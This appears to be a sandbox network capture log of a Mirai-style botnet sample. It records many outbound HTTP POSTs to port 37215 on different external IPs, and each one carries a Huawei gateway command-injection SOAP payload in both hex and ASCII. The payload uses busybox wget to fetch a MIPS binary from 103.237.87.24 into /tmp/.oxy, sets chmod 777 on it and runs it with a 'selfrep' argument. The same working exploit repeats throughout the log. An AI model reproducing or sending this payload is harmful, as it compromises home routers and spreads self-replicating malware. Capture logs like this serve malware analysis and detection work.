                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1215192.168.2.135608841.85.10.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447238922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1216192.168.2.1359434157.224.247.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447259903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1217192.168.2.135745241.137.240.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447834969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1218192.168.2.1340686204.70.51.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447871923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1219192.168.2.1350544197.50.45.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447880030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1220192.168.2.1344596157.162.122.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447927952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1221192.168.2.1336076197.240.178.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447932959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1222192.168.2.1354270157.189.213.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447949886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1223192.168.2.135246041.39.99.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447983027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1224192.168.2.1342502107.202.16.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448000908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 